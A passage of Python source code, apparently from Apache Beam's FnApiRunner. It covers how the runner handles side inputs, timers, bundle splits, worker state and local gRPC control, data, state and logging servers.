pipeline_context.PipelineContext pipeline_components, # type: beam_runner_api_pb2.Components data_side_input, # type: DataSideInput pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> None for (transform_id, tag), (buffer_id, si) in data_side_input.items(): _, pcoll_id = split_buffer_id(buffer_id) value_coder = context.coders[safe_coders[ pipeline_components.pcollections[pcoll_id].coder_id]] elements_by_window = _WindowGroupingBuffer(si, value_coder) if buffer_id not in pcoll_buffers: pcoll_buffers[buffer_id] = _ListBuffer( coder_impl=value_coder.get_impl()) for element_data in pcoll_buffers[buffer_id]: elements_by_window.append(element_data) if si.urn == common_urns.side_inputs.ITERABLE.urn: for _, window, elements_data in elements_by_window.encoded_items(): state_key = beam_fn_api_pb2.StateKey( iterable_side_input=beam_fn_api_pb2.StateKey.IterableSideInput( transform_id=transform_id, side_input_id=tag, window=window)) worker_handler.state.append_raw(state_key, elements_data) elif si.urn == common_urns.side_inputs.MULTIMAP.urn: for key, window, elements_data in elements_by_window.encoded_items(): state_key = beam_fn_api_pb2.StateKey( multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput( transform_id=transform_id, side_input_id=tag, window=window, key=key)) worker_handler.state.append_raw(state_key, elements_data) else: raise ValueError("Unknown access pattern: '%s'" % si.urn) def _run_bundle_multiple_times_for_testing( self, worker_handler_list, # type: Sequence[WorkerHandler] process_bundle_descriptor, data_input, data_output, # type: DataOutput get_input_coder_callable, cache_token_generator ): # type: (...) -> None """ If bundle_repeat > 0, replay every bundle for profiling and debugging. """ # all workers share state, so use any worker_handler. worker_handler = worker_handler_list[0] for k in range(self._bundle_repeat): try: worker_handler.state.checkpoint() testing_bundle_manager = ParallelBundleManager( worker_handler_list, lambda pcoll_id, transform_id: _ListBuffer(coder_impl=get_input_coder_callable), get_input_coder_callable, process_bundle_descriptor, self._progress_frequency, k, num_workers=self._num_workers, cache_token_generator=cache_token_generator) testing_bundle_manager.process_bundle(data_input, data_output) finally: worker_handler.state.restore() def _collect_written_timers_and_add_to_deferred_inputs( self, context, # type: pipeline_context.PipelineContext pipeline_components, # type: beam_runner_api_pb2.Components stage, # type: translations.Stage get_buffer_callable, deferred_inputs # type: MutableMapping[str, PartitionableBuffer] ): # type: (...) -> None for transform_id, timer_writes in stage.timer_pcollections: # Queue any set timers as new inputs. windowed_timer_coder_impl = context.coders[ pipeline_components.pcollections[timer_writes].coder_id].get_impl() written_timers = get_buffer_callable( create_buffer_id(timer_writes, kind='timers'), transform_id) if not written_timers.cleared: # Keep only the "last" timer set per key and window. timers_by_key_and_window = {} for elements_data in written_timers: input_stream = create_InputStream(elements_data) while input_stream.size() > 0: windowed_key_timer = windowed_timer_coder_impl.decode_from_stream( input_stream, True) key, _ = windowed_key_timer.value # TODO: Explode and merge windows. assert len(windowed_key_timer.windows) == 1 timers_by_key_and_window[ key, windowed_key_timer.windows[0]] = windowed_key_timer out = create_OutputStream() for windowed_key_timer in timers_by_key_and_window.values(): windowed_timer_coder_impl.encode_to_stream( windowed_key_timer, out, True) deferred_inputs[transform_id] = _ListBuffer( coder_impl=windowed_timer_coder_impl) deferred_inputs[transform_id].append(out.get()) written_timers.clear() def _add_residuals_and_channel_splits_to_deferred_inputs( self, splits, # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] get_input_coder_impl_callable, input_for_callable, last_sent, deferred_inputs # type: MutableMapping[str, PartitionableBuffer] ): # type: (...) -> None prev_stops = {} # type: Dict[str, int] for split in splits: for delayed_application in split.residual_roots: name = input_for_callable( delayed_application.application.transform_id, delayed_application.application.input_id) if name not in deferred_inputs: deferred_inputs[name] = _ListBuffer( coder_impl=get_input_coder_impl_callable(name)) deferred_inputs[name].append(delayed_application.application.element) for channel_split in split.channel_splits: coder_impl = get_input_coder_impl_callable(channel_split.transform_id) # TODO(SDF): This requires determanistic ordering of buffer iteration. # TODO(SDF): The return split is in terms of indices. Ideally, # a runner could map these back to actual positions to effectively # describe the two "halves" of the now-split range. Even if we have # to buffer each element we send (or at the very least a bit of # metadata, like position, about each of them) this should be doable # if they're already in memory and we are bounding the buffer size # (e.g. to 10mb plus whatever is eagerly read from the SDK). In the # case of non-split-points, we can either immediately replay the # "non-split-position" elements or record them as we do the other # delayed applications. # Decode and recode to split the encoded buffer by element index. all_elements = list( coder_impl.decode_all( b''.join(last_sent[channel_split.transform_id]))) residual_elements = all_elements[ channel_split.first_residual_element:prev_stops. get(channel_split.transform_id, len(all_elements)) + 1] if residual_elements: if channel_split.transform_id not in deferred_inputs: coder_impl = get_input_coder_impl_callable( channel_split.transform_id) deferred_inputs[channel_split.transform_id] = _ListBuffer( coder_impl=coder_impl) deferred_inputs[channel_split.transform_id].append( coder_impl.encode_all(residual_elements)) prev_stops[ channel_split.transform_id] = channel_split.last_primary_element @staticmethod def _extract_stage_data_endpoints( stage, # type: translations.Stage pipeline_components, # type: beam_runner_api_pb2.Components data_api_service_descriptor, pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> Tuple[Dict[Tuple[str, str], PartitionableBuffer], DataSideInput, Dict[Tuple[str, str], bytes]] # Returns maps of transform names to PCollection identifiers. # Also mutates IO stages to point to the data ApiServiceDescriptor. data_input = {} # type: Dict[Tuple[str, str], PartitionableBuffer] data_side_input = {} # type: DataSideInput data_output = {} # type: Dict[Tuple[str, str], bytes] for transform in stage.transforms: if transform.spec.urn in (bundle_processor.DATA_INPUT_URN, bundle_processor.DATA_OUTPUT_URN): pcoll_id = transform.spec.payload if transform.spec.urn == bundle_processor.DATA_INPUT_URN: target = transform.unique_name, only_element(transform.outputs) coder_id = pipeline_components.pcollections[only_element( transform.outputs.values())].coder_id if coder_id in stage.context.coders[safe_coders[coder_id]]: coder = stage.context.coders[safe_coders[coder_id]] else: coder = stage.context.coders[coder_id] if pcoll_id == translations.IMPULSE_BUFFER: data_input[target] = _ListBuffer(coder_impl=coder.get_impl()) data_input[target].append(ENCODED_IMPULSE_VALUE) else: if pcoll_id not in pcoll_buffers: data_input[target] = _ListBuffer(coder_impl=coder.get_impl()) data_input[target] = pcoll_buffers[pcoll_id] elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN: target = transform.unique_name, only_element(transform.inputs) data_output[target] = pcoll_id coder_id = pipeline_components.pcollections[only_element( transform.inputs.values())].coder_id else: raise NotImplementedError data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id) if data_api_service_descriptor: data_spec.api_service_descriptor.url = ( data_api_service_descriptor.url) transform.spec.payload = data_spec.SerializeToString() elif transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) for tag, si in payload.side_inputs.items(): data_side_input[transform.unique_name, tag] = ( create_buffer_id(transform.inputs[tag]), si.access_pattern) return data_input, data_side_input, data_output def _run_stage(self, worker_handler_factory, # type: Callable[[Optional[str], int], List[WorkerHandler]] pipeline_components, # type: beam_runner_api_pb2.Components stage, # type: translations.Stage pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> beam_fn_api_pb2.InstructionResponse """Run an individual stage. Args: worker_handler_factory: A ``callable`` that takes in an environment id and a number of workers, and returns a list of ``WorkerHandler``s. pipeline_components (beam_runner_api_pb2.Components): TODO stage (translations.Stage) pcoll_buffers (collections.defaultdict of str: list): Mapping of PCollection IDs to list that functions as buffer for the ``beam.PCollection``. safe_coders (dict): TODO """ def iterable_state_write(values, element_coder_impl): # type: (...) -> bytes token = unique_name(None, 'iter').encode('ascii') out = create_OutputStream() for element in values: element_coder_impl.encode_to_stream(element, out, True) worker_handler.state.append_raw( beam_fn_api_pb2.StateKey( runner=beam_fn_api_pb2.StateKey.Runner(key=token)), out.get()) return token worker_handler_list = worker_handler_factory( stage.environment, self._num_workers) # All worker_handlers share the same grpc server, so we can read grpc server # info from any worker_handler and read from the first worker_handler. worker_handler = next(iter(worker_handler_list)) context = pipeline_context.PipelineContext( pipeline_components, iterable_state_write=iterable_state_write) data_api_service_descriptor = worker_handler.data_api_service_descriptor() _LOGGER.info('Running %s', stage.name) data_input, data_side_input, data_output = self._extract_endpoints( stage, pipeline_components, data_api_service_descriptor, pcoll_buffers, context, safe_coders) process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor( id=self._next_uid(), transforms={ transform.unique_name: transform for transform in stage.transforms }, pcollections=dict(pipeline_components.pcollections.items()), coders=dict(pipeline_components.coders.items()), windowing_strategies=dict( pipeline_components.windowing_strategies.items()), environments=dict(pipeline_components.environments.items())) state_api_service_descriptor = worker_handler.state_api_service_descriptor() if state_api_service_descriptor: process_bundle_descriptor.state_api_service_descriptor.url = ( state_api_service_descriptor.url) # Store the required side inputs into state so it is accessible for the # worker when it runs this bundle. self._store_side_inputs_in_state( worker_handler, context, pipeline_components, data_side_input, pcoll_buffers, safe_coders) def get_buffer(buffer_id, transform_id): # type: (bytes, str) -> PartitionableBuffer """Returns the buffer for a given (operation_type, PCollection ID). For grouping-typed operations, we produce a ``_GroupingBuffer``. For others, we produce a ``_ListBuffer``. """ kind, name = split_buffer_id(buffer_id) if kind in ('materialize', 'timers'): if buffer_id not in pcoll_buffers: pcoll_buffers[buffer_id] = _ListBuffer( coder_impl=get_input_coder_impl(transform_id)) return pcoll_buffers[buffer_id] elif kind == 'group': # This is a grouping write, create a grouping buffer if needed. if buffer_id not in pcoll_buffers: original_gbk_transform = name transform_proto = pipeline_components.transforms[ original_gbk_transform] input_pcoll = only_element(list(transform_proto.inputs.values())) output_pcoll = only_element(list(transform_proto.outputs.values())) pre_gbk_coder = context.coders[safe_coders[ pipeline_components.pcollections[input_pcoll].coder_id]] post_gbk_coder = context.coders[safe_coders[ pipeline_components.pcollections[output_pcoll].coder_id]] windowing_strategy = context.windowing_strategies[ pipeline_components.pcollections[output_pcoll]. windowing_strategy_id] pcoll_buffers[buffer_id] = _GroupingBuffer( pre_gbk_coder, post_gbk_coder, windowing_strategy) else: # These should be the only two identifiers we produce for now, # but special side input writes may go here. raise NotImplementedError(buffer_id) return pcoll_buffers[buffer_id] def get_input_coder_impl(transform_id): # type: (str) -> CoderImpl coder_id = beam_fn_api_pb2.RemoteGrpcPort.FromString( process_bundle_descriptor.transforms[transform_id].spec.payload ).coder_id assert coder_id if coder_id in safe_coders: return context.coders[safe_coders[coder_id]].get_impl() else: return context.coders[coder_id].get_impl() # Change cache token across bundle repeats cache_token_generator = FnApiRunner.get_cache_token_generator(static=False) self._run_bundle_multiple_times_for_testing( worker_handler_list, process_bundle_descriptor, data_input, data_output, get_input_coder_impl, cache_token_generator=cache_token_generator) bundle_manager = ParallelBundleManager( worker_handler_list, get_buffer, get_input_coder_impl, process_bundle_descriptor, self._progress_frequency, num_workers=self._num_workers, cache_token_generator=cache_token_generator) result, splits = bundle_manager.process_bundle(data_input, data_output) def input_for(transform_id, input_id): # type: (str, str) -> str input_pcoll = process_bundle_descriptor.transforms[transform_id].inputs[ input_id] for read_id, proto in process_bundle_descriptor.transforms.items(): if (proto.spec.urn == bundle_processor.DATA_INPUT_URN and input_pcoll in proto.outputs.values()): return read_id raise RuntimeError('No IO transform feeds %s' % transform_id) last_result = result last_sent = data_input # We cannot split deferred_input until we include residual_roots to # merged results. Without residual_roots, pipeline stops earlier and we # may miss some data. bundle_manager._num_workers = 1 while True: deferred_inputs = {} # type: Dict[str, PartitionableBuffer] self._collect_written_timers_and_add_to_deferred_inputs( context, pipeline_components, stage, get_buffer, deferred_inputs) # Queue any process-initiated delayed bundle applications. for delayed_application in last_result.process_bundle.residual_roots: name = input_for( delayed_application.application.transform_id, delayed_application.application.input_id) if name not in deferred_inputs: deferred_inputs[name] = _ListBuffer( coder_impl=get_input_coder_impl(name)) deferred_inputs[name].append(delayed_application.application.element) # Queue any runner-initiated delayed bundle applications. self._add_residuals_and_channel_splits_to_deferred_inputs( splits, get_input_coder_impl, input_for, last_sent, deferred_inputs) if deferred_inputs: # The worker will be waiting on these inputs as well. for other_input in data_input: if other_input not in deferred_inputs: deferred_inputs[other_input] = _ListBuffer( coder_impl=get_input_coder_impl(other_input)) # TODO(robertwb): merge results # TODO(BEAM-8486): this should be changed to _registered bundle_manager._skip_registration = True # type: ignore[attr-defined] last_result, splits = bundle_manager.process_bundle( deferred_inputs, data_output) last_sent = deferred_inputs result = beam_fn_api_pb2.InstructionResponse( process_bundle=beam_fn_api_pb2.ProcessBundleResponse( monitoring_infos=monitoring_infos.consolidate( itertools.chain( result.process_bundle.monitoring_infos, last_result.process_bundle.monitoring_infos))), error=result.error or last_result.error) else: break return result @staticmethod def _extract_endpoints(stage, # type: translations.Stage pipeline_components, # type: beam_runner_api_pb2.Components data_api_service_descriptor, # type: Optional[endpoints_pb2.ApiServiceDescriptor] pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] context, safe_coders ): # type: (...) -> Tuple[Dict[str, PartitionableBuffer], DataSideInput, DataOutput] """Returns maps of transform names to PCollection identifiers. Also mutates IO stages to point to the data ApiServiceDescriptor. Args: stage (translations.Stage): The stage to extract endpoints for. pipeline_components (beam_runner_api_pb2.Components): Components of the pipeline to include coders, transforms, PCollections, etc. data_api_service_descriptor: A GRPC endpoint descriptor for data plane. pcoll_buffers (dict): A dictionary containing buffers for PCollection elements. Returns: A tuple of (data_input, data_side_input, data_output) dictionaries. `data_input` is a dictionary mapping (transform_name, output_name) to a PCollection buffer; `data_output` is a dictionary mapping (transform_name, output_name) to a PCollection ID. """ data_input = {} # type: Dict[str, PartitionableBuffer] data_side_input = {} # type: DataSideInput data_output = {} # type: DataOutput for transform in stage.transforms: if transform.spec.urn in (bundle_processor.DATA_INPUT_URN, bundle_processor.DATA_OUTPUT_URN): pcoll_id = transform.spec.payload if transform.spec.urn == bundle_processor.DATA_INPUT_URN: coder_id = pipeline_components.pcollections[only_element( transform.outputs.values())].coder_id if coder_id in safe_coders: coder = context.coders[safe_coders[coder_id]] else: coder = context.coders[coder_id] if pcoll_id == translations.IMPULSE_BUFFER: data_input[transform.unique_name] = _ListBuffer( coder_impl=coder.get_impl()) data_input[transform.unique_name].append(ENCODED_IMPULSE_VALUE) else: if pcoll_id not in pcoll_buffers: pcoll_buffers[pcoll_id] = _ListBuffer(coder_impl=coder.get_impl()) data_input[transform.unique_name] = pcoll_buffers[pcoll_id] elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN: data_output[transform.unique_name] = pcoll_id coder_id = pipeline_components.pcollections[only_element( transform.inputs.values())].coder_id else: raise NotImplementedError data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id) if data_api_service_descriptor: data_spec.api_service_descriptor.url = ( data_api_service_descriptor.url) transform.spec.payload = data_spec.SerializeToString() elif transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) for tag, si in payload.side_inputs.items(): data_side_input[transform.unique_name, tag] = ( create_buffer_id(transform.inputs[tag]), si.access_pattern) return data_input, data_side_input, data_output # These classes are used to interact with the worker. class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer, sdk_worker.StateHandler): class CopyOnWriteState(object): def __init__(self, underlying): # type: (DefaultDict[bytes, Buffer]) -> None self._underlying = underlying self._overlay = {} # type: Dict[bytes, Buffer] def __getitem__(self, key): # type: (bytes) -> Buffer if key in self._overlay: return self._overlay[key] else: return FnApiRunner.StateServicer.CopyOnWriteList( self._underlying, self._overlay, key) def __delitem__(self, key): # type: (bytes) -> None self._overlay[key] = [] def commit(self): # type: () -> DefaultDict[bytes, Buffer] self._underlying.update(self._overlay) return self._underlying class CopyOnWriteList(object): def __init__(self, underlying, # type: DefaultDict[bytes, Buffer] overlay, # type: Dict[bytes, Buffer] key # type: bytes ): # type: (...) -> None self._underlying = underlying self._overlay = overlay self._key = key def __iter__(self): # type: () -> Iterator[bytes] if self._key in self._overlay: return iter(self._overlay[self._key]) else: return iter(self._underlying[self._key]) def append(self, item): # type: (bytes) -> None if self._key not in self._overlay: self._overlay[self._key] = list(self._underlying[self._key]) self._overlay[self._key].append(item) StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]] def __init__(self): # type: () -> None self._lock = threading.Lock() self._state = collections.defaultdict( list) # type: FnApiRunner.StateServicer.StateType self._checkpoint = None # type: Optional[FnApiRunner.StateServicer.StateType] self._use_continuation_tokens = False self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]] def checkpoint(self): # type: () -> None assert self._checkpoint is None and not \ isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState) self._checkpoint = self._state self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state) def commit(self): # type: () -> None assert isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState) and \ isinstance(self._checkpoint, FnApiRunner.StateServicer.CopyOnWriteState) self._state.commit() self._state = self._checkpoint.commit() self._checkpoint = None def restore(self): # type: () -> None assert self._checkpoint is not None self._state = self._checkpoint self._checkpoint = None @contextlib.contextmanager def process_instruction_id(self, unused_instruction_id): yield def get_raw(self, state_key, # type: beam_fn_api_pb2.StateKey continuation_token=None # type: Optional[bytes] ): # type: (...) -> Tuple[bytes, Optional[bytes]] with self._lock: full_state = self._state[self._to_key(state_key)] if self._use_continuation_tokens: # The token is "nonce:index". if not continuation_token: token_base = b'token_%x' % len(self._continuations) self._continuations[token_base] = tuple(full_state) return b'', b'%s:0' % token_base else: token_base, index = continuation_token.split(b':') ix = int(index) full_state_cont = self._continuations[token_base] if ix == len(full_state_cont): return b'', None else: return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1) else: assert not continuation_token return b''.join(full_state), None def append_raw( self, state_key, # type: beam_fn_api_pb2.StateKey data # type: bytes ): # type: (...) -> _Future with self._lock: self._state[self._to_key(state_key)].append(data) return _Future.done() def clear(self, state_key): # type: (beam_fn_api_pb2.StateKey) -> _Future with self._lock: try: del self._state[self._to_key(state_key)] except KeyError: # This may happen with the caching layer across bundles. Caching may # skip this storage layer for a blocking_get(key) request. Without # the caching, the state for a key would be initialized via the # defaultdict that _state uses. pass return _Future.done() @staticmethod def _to_key(state_key): # type: (beam_fn_api_pb2.StateKey) -> bytes return state_key.SerializeToString() class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer): def __init__(self, state): # type: (FnApiRunner.StateServicer) -> None self._state = state def State(self, request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest] context=None ): # type: (...) -> Iterator[beam_fn_api_pb2.StateResponse] # Note that this eagerly mutates state, assuming any failures are fatal. # Thus it is safe to ignore instruction_id. for request in request_stream: request_type = request.WhichOneof('request') if request_type == 'get': data, continuation_token = self._state.get_raw( request.state_key, request.get.continuation_token) yield beam_fn_api_pb2.StateResponse( id=request.id, get=beam_fn_api_pb2.StateGetResponse( data=data, continuation_token=continuation_token)) elif request_type == 'append': self._state.append_raw(request.state_key, request.append.data) yield beam_fn_api_pb2.StateResponse( id=request.id, append=beam_fn_api_pb2.StateAppendResponse()) elif request_type == 'clear': self._state.clear(request.state_key) yield beam_fn_api_pb2.StateResponse( id=request.id, clear=beam_fn_api_pb2.StateClearResponse()) else: raise NotImplementedError('Unknown state request: %s' % request_type) class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory): """A singleton cache for a StateServicer.""" def __init__(self, state_handler): # type: (sdk_worker.CachingStateHandler) -> None self._state_handler = state_handler def create_state_handler(self, api_service_descriptor): # type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler """Returns the singleton state handler.""" return self._state_handler def close(self): # type: () -> None """Does nothing.""" pass @staticmethod def get_cache_token_generator(static=True): """A generator for cache tokens. :arg static If True, generator always returns the same cache token If False, generator returns a new cache token each time :return A generator which returns a cache token on next(generator) """ def generate_token(identifier): return beam_fn_api_pb2.ProcessBundleRequest.CacheToken( user_state=beam_fn_api_pb2.ProcessBundleRequest.CacheToken.UserState( ), token="cache_token_{}".format(identifier).encode("utf-8")) class StaticGenerator(object): def __init__(self): self._token = generate_token(1) def __iter__(self): # pylint: disable=non-iterator-returned return self def __next__(self): return self._token class DynamicGenerator(object): def __init__(self): self._counter = 0 self._lock = threading.Lock() def __iter__(self): # pylint: disable=non-iterator-returned return self def __next__(self): with self._lock: self._counter += 1 return generate_token(self._counter) return StaticGenerator() if static else DynamicGenerator() class WorkerHandler(object): """worker_handler for a worker. It provides utilities to start / stop the worker, provision any resources for it, as well as provide descriptors for the data, state and logging APIs for it. """ _registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]] _worker_id_counter = -1 _lock = threading.Lock() control_conn = None # type: ControlConnection data_conn = None # type: data_plane._GrpcDataChannel def __init__(self, control_handler, data_plane_handler, state, # type: FnApiRunner.StateServicer provision_info # type: Optional[ExtendedProvisionInfo] ): # type: (...) -> None """Initialize a WorkerHandler. Args: control_handler: data_plane_handler (data_plane.DataChannel): state: provision_info: """ self.control_handler = control_handler self.data_plane_handler = data_plane_handler self.state = state self.provision_info = provision_info with WorkerHandler._lock: WorkerHandler._worker_id_counter += 1 self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter def close(self): # type: () -> None self.stop_worker() def start_worker(self): # type: () -> None raise NotImplementedError def stop_worker(self): # type: () -> None raise NotImplementedError def data_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError def state_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError def logging_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError @classmethod def register_environment( cls, urn, # type: str payload_type # type: Optional[Type[T]] ): # type: (...) -> Callable[[Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]] def wrapper(constructor): cls._registered_environments[urn] = constructor, payload_type return constructor return wrapper @classmethod def create(cls, environment, # type: beam_runner_api_pb2.Environment state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> WorkerHandler constructor, payload_type = cls._registered_environments[environment.urn] return constructor( proto_utils.parse_Bytes(environment.payload, payload_type), state, provision_info, grpc_server) @WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None) class EmbeddedWorkerHandler(WorkerHandler): """An in-memory worker_handler for fn API control, state and data planes.""" def __init__(self, unused_payload, # type: None state, # type: sdk_worker.StateHandler provision_info, # type: Optional[ExtendedProvisionInfo] unused_grpc_server # type: GrpcServer ): # type: (...) -> None super(EmbeddedWorkerHandler, self).__init__( self, data_plane.InMemoryDataChannel(), state, provision_info) self.control_conn = self # type: ignore # need Protocol to describe this self.data_conn = self.data_plane_handler state_cache = StateCache(STATE_CACHE_SIZE) self.bundle_processor_cache = sdk_worker.BundleProcessorCache( FnApiRunner.SingletonStateHandlerFactory( sdk_worker.CachingStateHandler(state_cache, state)), data_plane.InMemoryDataChannelFactory( self.data_plane_handler.inverse()), {}) self.worker = sdk_worker.SdkWorker( self.bundle_processor_cache, state_cache_metrics_fn=state_cache.get_monitoring_infos) self._uid_counter = 0 def push(self, request): if not request.instruction_id: self._uid_counter += 1 request.instruction_id = 'control_%s' % self._uid_counter response = self.worker.do_instruction(request) return ControlFuture(request.instruction_id, response) def start_worker(self): # type: () -> None pass def stop_worker(self): # type: () -> None self.bundle_processor_cache.shutdown() def done(self): # type: () -> None pass def data_api_service_descriptor(self): # type: () -> None return None def state_api_service_descriptor(self): # type: () -> None return None def logging_api_service_descriptor(self): # type: () -> None return None class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer): LOG_LEVEL_MAP = { beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL, beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR, beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING, beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1, beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO, beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG, beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1, beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET, } def Logging(self, log_messages, context=None): yield beam_fn_api_pb2.LogControl() for log_message in log_messages: for log in log_message.log_entries: logging.log(self.LOG_LEVEL_MAP[log.severity], str(log)) class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer ): def __init__(self, base_info, worker_manager): # type: (Optional[beam_provision_api_pb2.ProvisionInfo], WorkerHandlerManager) -> None self._base_info = base_info self._worker_manager = worker_manager def GetProvisionInfo(self, request, context=None): # type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse info = copy.copy(self._base_info) logging.error(('info', info, 'context', context)) if context: worker_id = dict(context.invocation_metadata())['worker_id'] worker = self._worker_manager.get_worker(worker_id) info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor()) info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor()) info.control_endpoint.CopyFrom(worker.control_api_service_descriptor()) logging.error(('info', info, 'worker_id', worker_id)) return beam_provision_api_pb2.GetProvisionInfoResponse(info=info) class EmptyArtifactRetrievalService( beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer): def GetManifest(self, request, context=None): return beam_artifact_api_pb2.GetManifestResponse( manifest=beam_artifact_api_pb2.Manifest()) def GetArtifact(self, request, context=None): raise ValueError('No artifacts staged.') class GrpcServer(object): _DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5 def __init__(self, state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] worker_manager, # type: WorkerHandlerManager ): # type: (...) -> None self.state = state self.provision_info = provision_info self.control_server = grpc.server(UnboundedThreadPoolExecutor()) self.control_port = self.control_server.add_insecure_port('[::]:0') self.control_address = 'localhost:%s' % self.control_port # Options to have no limits (-1) on the size of the messages # received or sent over the data plane. The actual buffer size # is controlled in a layer above. no_max_message_sizes = [("grpc.max_receive_message_length", -1), ("grpc.max_send_message_length", -1)] self.data_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.data_port = self.data_server.add_insecure_port('[::]:0') self.state_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.state_port = self.state_server.add_insecure_port('[::]:0') self.control_handler = BeamFnControlServicer() beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server( self.control_handler, self.control_server) # If we have provision info, serve these off the control port as well. if self.provision_info: if self.provision_info.provision_info: beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server( BasicProvisionService( self.provision_info.provision_info, worker_manager), self.control_server) if self.provision_info.artifact_staging_dir: service = artifact_service.BeamFilesystemArtifactService( self.provision_info.artifact_staging_dir ) # type: beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer else: service = EmptyArtifactRetrievalService() beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server( service, self.control_server) self.data_plane_handler = data_plane.BeamFnDataServicer( DATA_BUFFER_TIME_LIMIT_MS) beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server( self.data_plane_handler, self.data_server) beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server( FnApiRunner.GrpcStateServicer(state), self.state_server) self.logging_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.logging_port = self.logging_server.add_insecure_port('[::]:0') beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server( BasicLoggingService(), self.logging_server) _LOGGER.info('starting control server on port %s', self.control_port) _LOGGER.info('starting data server on port %s', self.data_port) _LOGGER.info('starting state server on port %s', self.state_port) _LOGGER.info('starting logging server on port %s', self.logging_port) self.logging_server.start() self.state_server.start() self.data_server.start() self.control_server.start() def close(self): self.control_handler.done() to_wait = [ self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS) ] for w in to_wait: w.wait() class GrpcWorkerHandler(WorkerHandler): """An grpc based worker_handler for fn API control, state and data planes.""" def __init__(self, state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None self._grpc_server = grpc_server super(GrpcWorkerHandler, self).__init__( self._grpc_server.control_handler, self._grpc_server.data_plane_handler, state, provision_info) self.state = state self.control_address = self.port_from_worker(self._grpc_server.control_port) self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id( self.worker_id) self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id( self.worker_id) def control_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.control_port)) def artifact_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.control_port)) def data_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.data_port)) def state_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.state_port)) def logging_api_service_descriptor(self): # type: () -> 